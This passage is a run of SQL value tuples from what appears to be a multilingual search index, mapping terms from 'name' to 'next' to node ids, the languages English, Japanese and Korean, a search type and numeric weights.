('name', 6, 'ko', 'help_search', 1),
('name', 8, 'en', 'help_search', 1),
('name', 8, 'ja', 'help_search', 1),
('name', 8, 'ko', 'help_search', 1),
('name', 13, 'en', 'help_search', 5),
('name', 13, 'ja', 'help_search', 5),
('name', 13, 'ko', 'help_search', 5),
('name', 28, 'en', 'help_search', 4.62515),
('name', 28, 'ja', 'help_search', 4.62515),
('name', 28, 'ko', 'help_search', 4.62515),
('name', 30, 'en', 'help_search', 1),
('name', 30, 'ja', 'help_search', 1),
('name', 30, 'ko', 'help_search', 1),
('name', 44, 'en', 'help_search', 1),
('name', 44, 'ja', 'help_search', 1),
('name', 44, 'ko', 'help_search', 1),
('name', 48, 'en', 'help_search', 4),
('name', 48, 'ja', 'help_search', 4),
('name', 48, 'ko', 'help_search', 4),
('name', 49, 'en', 'help_search', 8),
('name', 49, 'ja', 'help_search', 8),
('name', 49, 'ko', 'help_search', 8),
('name', 54, 'en', 'help_search', 4),
('name', 54, 'ja', 'help_search', 4),
('name', 54, 'ko', 'help_search', 4),
('name', 57, 'en', 'help_search', 1),
('name', 57, 'ja', 'help_search', 1),
('name', 57, 'ko', 'help_search', 1),
('name', 59, 'en', 'help_search', 1),
('name', 59, 'ja', 'help_search', 1),
('name', 59, 'ko', 'help_search', 1),
('name', 60, 'en', 'help_search', 5),
('name', 60, 'ja', 'help_search', 5),
('name', 60, 'ko', 'help_search', 5),
('name', 65, 'en', 'help_search', 1),
('name', 65, 'ja', 'help_search', 1),
('name', 65, 'ko', 'help_search', 1),
('name', 66, 'en', 'help_search', 1),
('name', 66, 'ja', 'help_search', 1),
('name', 68, 'en', 'help_search', 1),
('name', 68, 'ja', 'help_search', 1),
('name', 68, 'ko', 'help_search', 1),
('name', 71, 'en', 'help_search', 2),
('name', 71, 'ja', 'help_search', 2),
('name', 71, 'ko', 'help_search', 2),
('name', 74, 'en', 'help_search', 2),
('name', 74, 'ja', 'help_search', 2),
('name', 74, 'ko', 'help_search', 2),
('name', 75, 'en', 'help_search', 2),
('name', 75, 'ja', 'help_search', 2),
('name', 75, 'ko', 'help_search', 2),
('name', 79, 'en', 'help_search', 10),
('name', 79, 'ja', 'help_search', 10),
('name', 79, 'ko', 'help_search', 10),
('name', 83, 'en', 'help_search', 8),
('name', 83, 'ja', 'help_search', 8),
('name', 83, 'ko', 'help_search', 8),
('name', 86, 'en', 'help_search', 4),
('name', 86, 'ja', 'help_search', 4),
('name', 86, 'ko', 'help_search', 4),
('name', 87, 'en', 'help_search', 1),
('name', 87, 'ja', 'help_search', 1),
('name', 87, 'ko', 'help_search', 1),
('name', 88, 'en', 'help_search', 5),
('name', 88, 'ja', 'help_search', 5),
('name', 88, 'ko', 'help_search', 5),
('name', 89, 'en', 'help_search', 2),
('name', 89, 'ja', 'help_search', 2),
('name', 89, 'ko', 'help_search', 2),
('name', 90, 'en', 'help_search', 5),
('name', 90, 'ja', 'help_search', 5),
('name', 90, 'ko', 'help_search', 5),
('name', 91, 'en', 'help_search', 1),
('name', 91, 'ja', 'help_search', 1),
('name', 91, 'ko', 'help_search', 1),
('nan', 76, 'en', 'node_search', 5),
('nan', 76, 'ja', 'node_search', 5),
('nan', 93, 'en', 'node_search', 2),
('nan', 93, 'ja', 'node_search', 2),
('nan', 99, 'en', 'node_search', 2),
('nan', 99, 'ja', 'node_search', 2),
('nan', 128, 'en', 'node_search', 31),
('nan', 128, 'ja', 'node_search', 31),
('nan', 154, 'en', 'node_search', 1),
('nan', 154, 'ja', 'node_search', 1),
('nang', 103, 'en', 'node_search', 2),
('nang', 103, 'ja', 'node_search', 2),
('nang', 137, 'en', 'node_search', 28),
('nang', 137, 'ja', 'node_search', 28),
('nationalities', 27, 'en', 'node_search', 1),
('nationals', 7, 'en', 'node_search', 29),
('nationals', 7, 'ko', 'node_search', 29),
('native', 133, 'en', 'node_search', 1),
('native', 138, 'en', 'node_search', 1),
('nativespeaking', 136, 'en', 'node_search', 2),
('nattest', 23, 'en', 'node_search', 0.800068),
('nattest', 23, 'ja', 'node_search', 0.461031),
('nattest', 23, 'ko', 'node_search', 0.729424),
('nattest', 24, 'en', 'node_search', 1),
('nattest', 24, 'ja', 'node_search', 0.716357),
('nattest', 24, 'ko', 'node_search', 1),
('naung', 4, 'en', 'node_search', 1),
('naung', 4, 'ja', 'node_search', 1),
('navigate', 1, 'en', 'help_search', 1),
('navigate', 1, 'ja', 'help_search', 1),
('navigate', 1, 'ko', 'help_search', 1),
('navigate', 3, 'en', 'help_search', 1),
('navigate', 3, 'ja', 'help_search', 1),
('navigate', 3, 'ko', 'help_search', 1),
('navigate', 4, 'en', 'help_search', 1),
('navigate', 4, 'ja', 'help_search', 1),
('navigate', 4, 'ko', 'help_search', 1),
('navigate', 5, 'en', 'help_search', 1),
('navigate', 5, 'ja', 'help_search', 1),
('navigate', 5, 'ko', 'help_search', 1),
('navigate', 8, 'en', 'help_search', 1),
('navigate', 8, 'ja', 'help_search', 1),
('navigate', 8, 'ko', 'help_search', 1),
('navigate', 10, 'en', 'help_search', 3),
('navigate', 10, 'ja', 'help_search', 3),
('navigate', 10, 'ko', 'help_search', 3),
('navigate', 12, 'en', 'help_search', 1),
('navigate', 12, 'ja', 'help_search', 1),
('navigate', 12, 'ko', 'help_search', 1),
('navigate', 13, 'en', 'help_search', 1),
('navigate', 13, 'ja', 'help_search', 1),
('navigate', 13, 'ko', 'help_search', 1),
('navigate', 14, 'en', 'help_search', 1),
('navigate', 14, 'ja', 'help_search', 1),
('navigate', 14, 'ko', 'help_search', 1),
('navigate', 15, 'en', 'help_search', 1),
('navigate', 15, 'ja', 'help_search', 1),
('navigate', 15, 'ko', 'help_search', 1),
('navigate', 16, 'en', 'help_search', 1),
('navigate', 16, 'ja', 'help_search', 1),
('navigate', 16, 'ko', 'help_search', 1),
('navigate', 17, 'en', 'help_search', 1),
('navigate', 17, 'ja', 'help_search', 1),
('navigate', 17, 'ko', 'help_search', 1),
('navigate', 18, 'en', 'help_search', 2),
('navigate', 18, 'ja', 'help_search', 2),
('navigate', 18, 'ko', 'help_search', 2),
('navigate', 19, 'en', 'help_search', 1),
('navigate', 19, 'ja', 'help_search', 1),
('navigate', 19, 'ko', 'help_search', 1),
('navigate', 21, 'en', 'help_search', 1),
('navigate', 21, 'ja', 'help_search', 1),
('navigate', 21, 'ko', 'help_search', 1),
('navigate', 22, 'en', 'help_search', 1),
('navigate', 22, 'ja', 'help_search', 1),
('navigate', 22, 'ko', 'help_search', 1),
('navigate', 23, 'en', 'help_search', 1),
('navigate', 23, 'ja', 'help_search', 1),
('navigate', 23, 'ko', 'help_search', 1),
('navigate', 24, 'en', 'help_search', 2),
('navigate', 24, 'ja', 'help_search', 2),
('navigate', 24, 'ko', 'help_search', 2),
('navigate', 25, 'en', 'help_search', 2),
('navigate', 25, 'ja', 'help_search', 2),
('navigate', 26, 'en', 'help_search', 2),
('navigate', 26, 'ja', 'help_search', 2),
('navigate', 26, 'ko', 'help_search', 2),
('navigate', 27, 'en', 'help_search', 2),
('navigate', 27, 'ja', 'help_search', 2),
('navigate', 27, 'ko', 'help_search', 2),
('navigate', 28, 'en', 'help_search', 0.976851),
('navigate', 28, 'ja', 'help_search', 0.976851),
('navigate', 28, 'ko', 'help_search', 0.976851),
('navigate', 32, 'en', 'help_search', 1),
('navigate', 32, 'ja', 'help_search', 1),
('navigate', 32, 'ko', 'help_search', 1),
('navigate', 36, 'en', 'help_search', 1),
('navigate', 36, 'ja', 'help_search', 1),
('navigate', 36, 'ko', 'help_search', 1),
('navigate', 37, 'en', 'help_search', 0.876337),
('navigate', 37, 'ja', 'help_search', 0.876337),
('navigate', 37, 'ko', 'help_search', 0.876337),
('navigate', 43, 'en', 'help_search', 2),
('navigate', 43, 'ja', 'help_search', 2),
('navigate', 43, 'ko', 'help_search', 2),
('navigate', 45, 'en', 'help_search', 4),
('navigate', 45, 'ja', 'help_search', 4),
('navigate', 45, 'ko', 'help_search', 4),
('navigate', 48, 'en', 'help_search', 1),
('navigate', 48, 'ja', 'help_search', 1),
('navigate', 48, 'ko', 'help_search', 1),
('navigate', 49, 'en', 'help_search', 1),
('navigate', 49, 'ja', 'help_search', 1),
('navigate', 49, 'ko', 'help_search', 1),
('navigate', 50, 'en', 'help_search', 1),
('navigate', 50, 'ja', 'help_search', 1),
('navigate', 50, 'ko', 'help_search', 1),
('navigate', 51, 'en', 'help_search', 1),
('navigate', 51, 'ja', 'help_search', 1),
('navigate', 51, 'ko', 'help_search', 1),
('navigate', 52, 'en', 'help_search', 1),
('navigate', 52, 'ja', 'help_search', 1),
('navigate', 52, 'ko', 'help_search', 1),
('navigate', 53, 'en', 'help_search', 2),
('navigate', 53, 'ja', 'help_search', 2),
('navigate', 53, 'ko', 'help_search', 2),
('navigate', 54, 'en', 'help_search', 1),
('navigate', 54, 'ja', 'help_search', 1),
('navigate', 54, 'ko', 'help_search', 1),
('navigate', 55, 'en', 'help_search', 1),
('navigate', 55, 'ja', 'help_search', 1),
('navigate', 55, 'ko', 'help_search', 1),
('navigate', 56, 'en', 'help_search', 2),
('navigate', 56, 'ja', 'help_search', 2),
('navigate', 56, 'ko', 'help_search', 2),
('navigate', 57, 'en', 'help_search', 1),
('navigate', 57, 'ja', 'help_search', 1),
('navigate', 57, 'ko', 'help_search', 1),
('navigate', 58, 'en', 'help_search', 1),
('navigate', 58, 'ja', 'help_search', 1),
('navigate', 58, 'ko', 'help_search', 1),
('navigate', 59, 'en', 'help_search', 1),
('navigate', 59, 'ja', 'help_search', 1),
('navigate', 59, 'ko', 'help_search', 1),
('navigate', 60, 'en', 'help_search', 1),
('navigate', 60, 'ja', 'help_search', 1),
('navigate', 60, 'ko', 'help_search', 1),
('navigate', 61, 'en', 'help_search', 1),
('navigate', 61, 'ja', 'help_search', 1),
('navigate', 61, 'ko', 'help_search', 1),
('navigate', 64, 'en', 'help_search', 1),
('navigate', 64, 'ja', 'help_search', 1),
('navigate', 64, 'ko', 'help_search', 1),
('navigate', 66, 'en', 'help_search', 1),
('navigate', 66, 'ja', 'help_search', 1),
('navigate', 67, 'en', 'help_search', 1),
('navigate', 67, 'ja', 'help_search', 1),
('navigate', 67, 'ko', 'help_search', 1),
('navigate', 69, 'en', 'help_search', 1),
('navigate', 69, 'ja', 'help_search', 1),
('navigate', 69, 'ko', 'help_search', 1),
('navigate', 70, 'en', 'help_search', 1),
('navigate', 70, 'ja', 'help_search', 1),
('navigate', 70, 'ko', 'help_search', 1),
('navigate', 71, 'en', 'help_search', 3),
('navigate', 71, 'ja', 'help_search', 3),
('navigate', 71, 'ko', 'help_search', 3),
('navigate', 72, 'en', 'help_search', 1.93838),
('navigate', 72, 'ja', 'help_search', 1.93838),
('navigate', 72, 'ko', 'help_search', 1.93838),
('navigate', 73, 'en', 'help_search', 2),
('navigate', 73, 'ja', 'help_search', 2),
('navigate', 73, 'ko', 'help_search', 2),
('navigate', 74, 'en', 'help_search', 1),
('navigate', 74, 'ja', 'help_search', 1),
('navigate', 74, 'ko', 'help_search', 1),
('navigate', 75, 'en', 'help_search', 1),
('navigate', 75, 'ja', 'help_search', 1),
('navigate', 75, 'ko', 'help_search', 1),
('navigate', 76, 'en', 'help_search', 3),
('navigate', 76, 'ja', 'help_search', 3),
('navigate', 76, 'ko', 'help_search', 3),
('navigate', 77, 'en', 'help_search', 1),
('navigate', 77, 'ja', 'help_search', 1),
('navigate', 77, 'ko', 'help_search', 1),
('navigate', 78, 'en', 'help_search', 1),
('navigate', 78, 'ja', 'help_search', 1),
('navigate', 78, 'ko', 'help_search', 1),
('navigate', 79, 'en', 'help_search', 1),
('navigate', 79, 'ja', 'help_search', 1),
('navigate', 79, 'ko', 'help_search', 1),
('navigate', 82, 'en', 'help_search', 1),
('navigate', 82, 'ja', 'help_search', 1),
('navigate', 82, 'ko', 'help_search', 1),
('navigate', 83, 'en', 'help_search', 1),
('navigate', 83, 'ja', 'help_search', 1),
('navigate', 83, 'ko', 'help_search', 1),
('navigate', 85, 'en', 'help_search', 1),
('navigate', 85, 'ja', 'help_search', 1),
('navigate', 85, 'ko', 'help_search', 1),
('navigate', 86, 'en', 'help_search', 1),
('navigate', 86, 'ja', 'help_search', 1),
('navigate', 86, 'ko', 'help_search', 1),
('navigate', 87, 'en', 'help_search', 1),
('navigate', 87, 'ja', 'help_search', 1),
('navigate', 87, 'ko', 'help_search', 1),
('navigate', 88, 'en', 'help_search', 1),
('navigate', 88, 'ja', 'help_search', 1),
('navigate', 88, 'ko', 'help_search', 1),
('navigate', 89, 'en', 'help_search', 1),
('navigate', 89, 'ja', 'help_search', 1),
('navigate', 89, 'ko', 'help_search', 1),
('navigate', 90, 'en', 'help_search', 1),
('navigate', 90, 'ja', 'help_search', 1),
('navigate', 90, 'ko', 'help_search', 1),
('navigate', 91, 'en', 'help_search', 1),
('navigate', 91, 'ja', 'help_search', 1),
('navigate', 91, 'ko', 'help_search', 1),
('navigate', 92, 'en', 'help_search', 1),
('navigate', 92, 'ja', 'help_search', 1),
('navigate', 92, 'ko', 'help_search', 1),
('navigating', 9, 'en', 'help_search', 1),
('navigating', 9, 'ja', 'help_search', 1),
('navigating', 9, 'ko', 'help_search', 1),
('navigating', 22, 'en', 'help_search', 1),
('navigating', 22, 'ja', 'help_search', 1),
('navigating', 22, 'ko', 'help_search', 1),
('navigation', 68, 'en', 'help_search', 0.808176),
('navigation', 68, 'ja', 'help_search', 0.808176),
('navigation', 68, 'ko', 'help_search', 0.808176),
('naw', 125, 'en', 'node_search', 28),
('naw', 125, 'ja', 'node_search', 31),
('nay', 23, 'en', 'node_search', 1),
('nay', 27, 'en', 'node_search', 6.45308),
('nay', 121, 'en', 'node_search', 28),
('nay', 121, 'ja', 'node_search', 31),
('nay', 125, 'en', 'node_search', 28),
('nay', 125, 'ja', 'node_search', 31),
('naypyitaw', 27, 'en', 'node_search', 0.736141),
('near', 4, 'en', 'node_search', 1),
('near', 4, 'ja', 'node_search', 1),
('near', 45, 'en', 'help_search', 1),
('near', 45, 'ja', 'help_search', 1),
('near', 45, 'ko', 'help_search', 1),
('neatly', 87, 'en', 'node_search', 2),
('necessary', 24, 'en', 'node_search', 2.87634),
('necessary', 43, 'en', 'help_search', 0.896076),
('necessary', 43, 'ja', 'help_search', 0.896076),
('necessary', 43, 'ko', 'help_search', 0.896076),
('necessary', 89, 'en', 'help_search', 1),
('necessary', 89, 'ja', 'help_search', 1),
('necessary', 89, 'ko', 'help_search', 1),
('necessary', 91, 'en', 'help_search', 1),
('necessary', 91, 'ja', 'help_search', 1),
('necessary', 91, 'ko', 'help_search', 1),
('need', 1, 'en', 'help_search', 1),
('need', 1, 'en', 'node_search', 1),
('need', 1, 'ja', 'help_search', 1),
('need', 1, 'ko', 'help_search', 1),
('need', 3, 'en', 'node_search', 1),
('need', 3, 'ko', 'node_search', 0.993146),
('need', 5, 'en', 'node_search', 2),
('need', 5, 'ko', 'node_search', 2),
('need', 6, 'en', 'help_search', 1),
('need', 6, 'ja', 'help_search', 1),
('need', 6, 'ko', 'help_search', 1),
('need', 7, 'en', 'help_search', 3),
('need', 7, 'ja', 'help_search', 3),
('need', 7, 'ko', 'help_search', 3),
('need', 9, 'en', 'help_search', 3),
('need', 9, 'ja', 'help_search', 3),
('need', 9, 'ko', 'help_search', 3),
('need', 10, 'en', 'help_search', 1),
('need', 10, 'ja', 'help_search', 1),
('need', 10, 'ko', 'help_search', 1),
('need', 16, 'en', 'help_search', 1),
('need', 16, 'ja', 'help_search', 1),
('need', 16, 'ko', 'help_search', 1),
('need', 18, 'en', 'help_search', 1),
('need', 18, 'ja', 'help_search', 1),
('need', 18, 'ko', 'help_search', 1),
('need', 23, 'en', 'help_search', 1),
('need', 23, 'ja', 'help_search', 1),
('need', 23, 'ko', 'help_search', 1),
('need', 30, 'en', 'node_search', 28),
('need', 32, 'en', 'help_search', 1),
('need', 32, 'ja', 'help_search', 1),
('need', 32, 'ko', 'help_search', 1),
('need', 33, 'en', 'help_search', 1),
('need', 33, 'ja', 'help_search', 1),
('need', 33, 'ko', 'help_search', 1),
('need', 38, 'en', 'help_search', 1),
('need', 38, 'ja', 'help_search', 1),
('need', 38, 'ko', 'help_search', 1),
('need', 39, 'en', 'help_search', 1),
('need', 39, 'ja', 'help_search', 1),
('need', 39, 'ko', 'help_search', 1),
('need', 46, 'en', 'help_search', 1),
('need', 46, 'ja', 'help_search', 1),
('need', 46, 'ko', 'help_search', 1),
('need', 54, 'en', 'help_search', 1),
('need', 54, 'ja', 'help_search', 1),
('need', 54, 'ko', 'help_search', 1),
('need', 59, 'en', 'help_search', 1),
('need', 59, 'ja', 'help_search', 1),
('need', 59, 'ko', 'help_search', 1),
('need', 61, 'en', 'help_search', 1),
('need', 61, 'ja', 'help_search', 1),
('need', 61, 'ko', 'help_search', 1),
('need', 63, 'en', 'help_search', 1),
('need', 63, 'ja', 'help_search', 1),
('need', 63, 'ko', 'help_search', 1),
('need', 68, 'en', 'help_search', 2.56694),
('need', 68, 'ja', 'help_search', 2.56694),
('need', 68, 'ko', 'help_search', 2.56694),
('need', 69, 'en', 'help_search', 1),
('need', 69, 'ja', 'help_search', 1),
('need', 69, 'ko', 'help_search', 1),
('need', 70, 'en', 'help_search', 1),
('need', 70, 'ja', 'help_search', 1),
('need', 70, 'ko', 'help_search', 1),
('need', 71, 'en', 'help_search', 1),
('need', 71, 'ja', 'help_search', 1),
('need', 71, 'ko', 'help_search', 1),
('need', 74, 'en', 'help_search', 1),
('need', 74, 'ja', 'help_search', 1),
('need', 74, 'ko', 'help_search', 1),
('need', 75, 'en', 'help_search', 2),
('need', 75, 'ja', 'help_search', 2),
('need', 75, 'ko', 'help_search', 2),
('need', 76, 'en', 'help_search', 1),
('need', 76, 'ja', 'help_search', 1),
('need', 76, 'ko', 'help_search', 1),
('need', 79, 'en', 'help_search', 1),
('need', 79, 'ja', 'help_search', 1),
('need', 79, 'ko', 'help_search', 1),
('need', 81, 'en', 'help_search', 1),
('need', 81, 'ja', 'help_search', 1),
('need', 81, 'ko', 'help_search', 1),
('need', 86, 'en', 'help_search', 1),
('need', 86, 'ja', 'help_search', 1),
('need', 86, 'ko', 'help_search', 1),
('need', 89, 'en', 'help_search', 2),
('need', 89, 'ja', 'help_search', 2),
('need', 89, 'ko', 'help_search', 2),
('need', 135, 'en', 'node_search', 1),
('need', 142, 'en', 'node_search', 1),
('needed', 4, 'en', 'node_search', 1),
('needed', 4, 'ja', 'node_search', 1),
('needed', 5, 'en', 'node_search', 4),
('needed', 5, 'ko', 'node_search', 4),
('needed', 6, 'en', 'node_search', 3),
('needed', 24, 'en', 'node_search', 0.78951),
('needed', 25, 'ja', 'help_search', 1),
('needed', 26, 'en', 'help_search', 1),
('needed', 26, 'ja', 'help_search', 1),
('needed', 26, 'ko', 'help_search', 1),
('needed', 37, 'en', 'help_search', 2),
('needed', 37, 'ja', 'help_search', 2),
('needed', 37, 'ko', 'help_search', 2),
('needed', 68, 'en', 'help_search', 1.80574),
('needed', 68, 'ja', 'help_search', 1.80574),
('needed', 68, 'ko', 'help_search', 1.80574),
('needing', 22, 'en', 'help_search', 1),
('needing', 22, 'ja', 'help_search', 1),
('needing', 22, 'ko', 'help_search', 1),
('needs', 26, 'en', 'node_search', 1),
('needs', 37, 'en', 'help_search', 0.989021),
('needs', 37, 'ja', 'help_search', 0.989021),
('needs', 37, 'ko', 'help_search', 0.989021),
('never', 47, 'en', 'help_search', 1),
('never', 47, 'ja', 'help_search', 1),
('never', 47, 'ko', 'help_search', 1),
('new', 1, 'en', 'node_search', 17),
('new', 1, 'ja', 'node_search', 26),
('new', 1, 'ko', 'node_search', 17),
('new', 4, 'en', 'node_search', 1),
('new', 4, 'ja', 'node_search', 1),
('new', 4, 'ko', 'node_search', 1),
('new', 5, 'en', 'help_search', 1),
('new', 5, 'en', 'node_search', 1),
('new', 5, 'ja', 'help_search', 1),
('new', 5, 'ja', 'node_search', 0.731649),
('new', 5, 'ko', 'help_search', 1),
('new', 5, 'ko', 'node_search', 1),
('new', 7, 'en', 'help_search', 2.76565),
('new', 7, 'ja', 'help_search', 2.76565),
('new', 7, 'ko', 'help_search', 2.76565),
('new', 8, 'en', 'help_search', 2),
('new', 8, 'ja', 'help_search', 2),
('new', 8, 'ko', 'help_search', 2),
('new', 9, 'en', 'help_search', 2),
('new', 9, 'en', 'node_search', 28),
('new', 9, 'ja', 'help_search', 2),
('new', 9, 'ko', 'help_search', 2),
('new', 9, 'ko', 'node_search', 28),
('new', 10, 'en', 'node_search', 1),
('new', 10, 'ja', 'node_search', 1),
('new', 10, 'ko', 'node_search', 1),
('new', 11, 'en', 'help_search', 1),
('new', 11, 'en', 'node_search', 16),
('new', 11, 'ja', 'help_search', 1),
('new', 11, 'ko', 'help_search', 1),
('new', 16, 'en', 'help_search', 1),
('new', 16, 'ja', 'help_search', 1),
('new', 16, 'ko', 'help_search', 1),
('new', 17, 'en', 'node_search', 30),
('new', 17, 'ko', 'node_search', 30),
('new', 18, 'en', 'help_search', 1),
('new', 18, 'en', 'node_search', 1),
('new', 18, 'ja', 'help_search', 1),
('new', 18, 'ja', 'node_search', 0.892724),
('new', 18, 'ko', 'help_search', 1),
('new', 18, 'ko', 'node_search', 1),
('new', 19, 'en', 'help_search', 28),
('new', 19, 'en', 'node_search', 1),
('new', 19, 'ja', 'help_search', 28),
('new', 19, 'ko', 'help_search', 28),
('new', 19, 'ko', 'node_search', 1),
('new', 23, 'en', 'help_search', 5.48567),
('new', 23, 'en', 'node_search', 10.653),
('new', 23, 'ja', 'help_search', 5.48567),
('new', 23, 'ko', 'help_search', 5.48567),
('new', 23, 'ko', 'node_search', 2.78177),
('new', 24, 'en', 'help_search', 5),
('new', 24, 'en', 'node_search', 0.824901),
('new', 24, 'ja', 'help_search', 5),
('new', 24, 'ko', 'help_search', 5),
('new', 24, 'ko', 'node_search', 1.81645),
('new', 27, 'en', 'help_search', 4.99315),
('new', 27, 'en', 'node_search', 21.8185),
('new', 27, 'ja', 'help_search', 4.99315),
('new', 27, 'ko', 'help_search', 4.99315),
('new', 28, 'en', 'help_search', 1.71949),
('new', 28, 'en', 'node_search', 3),
('new', 28, 'ja', 'help_search', 1.71949),
('new', 28, 'ja', 'node_search', 28),
('new', 28, 'ko', 'help_search', 1.71949),
('new', 28, 'ko', 'node_search', 28),
('new', 29, 'en', 'node_search', 28),
('new', 29, 'ja', 'node_search', 28),
('new', 29, 'ko', 'node_search', 28),
('new', 30, 'en', 'help_search', 0.845322),
('new', 30, 'en', 'node_search', 1),
('new', 30, 'ja', 'help_search', 0.845322),
('new', 30, 'ja', 'node_search', 0.842342),
('new', 30, 'ko', 'help_search', 0.845322),
('new', 30, 'ko', 'node_search', 1),
('new', 36, 'en', 'help_search', 1),
('new', 36, 'ja', 'help_search', 1),
('new', 36, 'ko', 'help_search', 1),
('new', 41, 'en', 'help_search', 1),
('new', 41, 'ja', 'help_search', 1),
('new', 41, 'ko', 'help_search', 1),
('new', 43, 'en', 'help_search', 1),
('new', 43, 'ja', 'help_search', 1),
('new', 43, 'ko', 'help_search', 1),
('new', 45, 'en', 'help_search', 1),
('new', 45, 'ja', 'help_search', 1),
('new', 45, 'ko', 'help_search', 1),
('new', 47, 'en', 'help_search', 16),
('new', 47, 'ja', 'help_search', 16),
('new', 47, 'ko', 'help_search', 16),
('new', 48, 'en', 'help_search', 6),
('new', 48, 'ja', 'help_search', 6),
('new', 48, 'ko', 'help_search', 6),
('new', 52, 'en', 'help_search', 1),
('new', 52, 'ja', 'help_search', 1),
('new', 52, 'ko', 'help_search', 1),
('new', 54, 'en', 'help_search', 28),
('new', 54, 'ja', 'help_search', 28),
('new', 54, 'ko', 'help_search', 28),
('new', 57, 'en', 'help_search', 1),
('new', 57, 'ja', 'help_search', 1),
('new', 57, 'ko', 'help_search', 1),
('new', 58, 'en', 'help_search', 1),
('new', 58, 'ja', 'help_search', 1),
('new', 58, 'ko', 'help_search', 1),
('new', 59, 'en', 'help_search', 1),
('new', 59, 'ja', 'help_search', 1),
('new', 59, 'ko', 'help_search', 1),
('new', 60, 'en', 'help_search', 3),
('new', 60, 'ja', 'help_search', 3),
('new', 60, 'ko', 'help_search', 3),
('new', 62, 'en', 'node_search', 1),
('new', 62, 'ja', 'node_search', 0.794753),
('new', 63, 'en', 'help_search', 2),
('new', 63, 'ja', 'help_search', 2),
('new', 63, 'ko', 'help_search', 2),
('new', 64, 'en', 'help_search', 1),
('new', 64, 'ja', 'help_search', 1),
('new', 64, 'ko', 'help_search', 1),
('new', 66, 'en', 'help_search', 1),
('new', 66, 'en', 'node_search', 4.97286),
('new', 66, 'ja', 'help_search', 1),
('new', 67, 'ja', 'node_search', 32),
('new', 69, 'en', 'node_search', 2),
('new', 69, 'ja', 'node_search', 1.91323),
('new', 77, 'en', 'help_search', 3),
('new', 77, 'ja', 'help_search', 3),
('new', 77, 'ko', 'help_search', 3),
('new', 79, 'en', 'help_search', 2),
('new', 79, 'ja', 'help_search', 2),
('new', 79, 'ko', 'help_search', 2),
('new', 80, 'en', 'help_search', 1),
('new', 80, 'ja', 'help_search', 1),
('new', 80, 'ko', 'help_search', 1),
('new', 82, 'en', 'help_search', 13),
('new', 82, 'ja', 'help_search', 13),
('new', 82, 'ko', 'help_search', 13),
('new', 83, 'en', 'help_search', 28),
('new', 83, 'ja', 'help_search', 28),
('new', 83, 'ko', 'help_search', 28),
('new', 86, 'en', 'help_search', 2),
('new', 86, 'ja', 'help_search', 2),
('new', 86, 'ko', 'help_search', 2),
('new', 87, 'en', 'help_search', 1),
('new', 87, 'ja', 'help_search', 1),
('new', 87, 'ko', 'help_search', 1),
('new', 88, 'en', 'help_search', 30),
('new', 88, 'ja', 'help_search', 30),
('new', 88, 'ko', 'help_search', 30),
('new', 90, 'en', 'help_search', 27),
('new', 90, 'ja', 'help_search', 27),
('new', 90, 'ko', 'help_search', 27),
('new', 91, 'en', 'help_search', 1),
('new', 91, 'ja', 'help_search', 1),
('new', 91, 'ko', 'help_search', 1),
('new', 98, 'en', 'node_search', 1),
('new', 98, 'ja', 'node_search', 19),
('new', 126, 'en', 'node_search', 1),
('new', 133, 'en', 'node_search', 2),
('new', 135, 'en', 'node_search', 2),
('new', 136, 'en', 'node_search', 2),
('new', 138, 'en', 'node_search', 2),
('new', 140, 'en', 'node_search', 1),
('new', 142, 'en', 'node_search', 48),
('new', 142, 'ja', 'node_search', 27),
('new', 154, 'en', 'node_search', 3),
('new', 155, 'en', 'node_search', 34),
('new', 156, 'en', 'node_search', 4),
('new', 156, 'ja', 'node_search', 1),
('new', 157, 'en', 'node_search', 4),
('new', 157, 'ja', 'node_search', 1),
('new', 160, 'en', 'node_search', 6),
('new', 161, 'en', 'node_search', 2),
('new', 162, 'en', 'node_search', 1.86366),
('new', 163, 'en', 'node_search', 1.85135),
('new', 164, 'en', 'node_search', 7),
('new', 165, 'en', 'node_search', 2),
('new', 166, 'en', 'node_search', 2),
('new', 167, 'en', 'node_search', 4),
('new', 168, 'en', 'node_search', 1),
('new', 169, 'en', 'node_search', 7),
('new', 170, 'en', 'node_search', 1),
('new', 171, 'en', 'node_search', 29),
('new', 173, 'en', 'node_search', 30),
('new', 174, 'en', 'node_search', 31),
('new', 175, 'en', 'node_search', 31),
('new', 176, 'en', 'node_search', 3),
('new', 177, 'en', 'node_search', 30),
('new', 178, 'en', 'node_search', 1),
('new', 179, 'en', 'node_search', 2),
('new', 180, 'en', 'node_search', 1),
('new', 181, 'en', 'node_search', 3),
('new', 182, 'en', 'node_search', 3),
('new', 183, 'en', 'node_search', 35),
('new', 184, 'en', 'node_search', 2),
('new', 185, 'en', 'node_search', 1),
('new', 186, 'en', 'node_search', 2),
('new', 187, 'en', 'node_search', 1),
('new', 188, 'en', 'node_search', 1),
('new', 189, 'en', 'node_search', 1),
('new', 190, 'en', 'node_search', 1),
('new', 191, 'en', 'node_search', 2),
('new', 192, 'en', 'node_search', 1),
('new', 193, 'en', 'node_search', 29),
('new', 194, 'en', 'node_search', 1),
('new', 195, 'en', 'node_search', 1),
('new', 196, 'en', 'node_search', 1),
('new', 197, 'en', 'node_search', 29),
('new', 198, 'en', 'node_search', 2),
('new', 199, 'en', 'node_search', 2),
('newcometagency', 11, 'en', 'node_search', 11),
('newcometagency', 11, 'ja', 'node_search', 11),
('newcometagency', 11, 'ko', 'node_search', 11),
('newcometagency', 62, 'en', 'node_search', 8.54373),
('newcometagency', 62, 'ja', 'node_search', 0.467218),
('newly', 47, 'en', 'help_search', 1),
('newly', 47, 'ja', 'help_search', 1),
('newly', 47, 'ko', 'help_search', 1),
('news', 11, 'en', 'help_search', 1),
('news', 11, 'ja', 'help_search', 1),
('news', 11, 'ko', 'help_search', 1),
('news', 66, 'en', 'node_search', 31),
('news', 93, 'en', 'help_search', 1),
('news', 93, 'ja', 'help_search', 1),
('news', 93, 'ko', 'help_search', 1),
('next', 7, 'en', 'help_search', 1),
('next', 7, 'ja', 'help_search', 1),
('next', 7, 'ko', 'help_search', 1),
('next', 16, 'en', 'help_search', 1),
('next', 16, 'ja', 'help_search', 1),
('next', 16, 'ko', 'help_search', 1),
('next', 24, 'en', 'help_search', 2),
('next', 24, 'ja', 'help_search', 2),
('next', 24, 'ko', 'help_search', 2),
('next', 27, 'en', 'help_search', 2),
('next', 27, 'ja', 'help_search', 2),
('next', 27, 'ko', 'help_search', 2),
('next', 37, 'en', 'help_search', 1),
('next', 37, 'ja', 'help_search', 1),
('next', 37, 'ko', 'help_search', 1),
('next', 48, 'en', 'help_search', 1),
('next', 48, 'ja', 'help_search', 1),
('next', 48, 'ko', 'help_search', 1),
('next', 69, 'en', 'help_search', 1),
('next', 69, 'ja', 'help_search', 1),
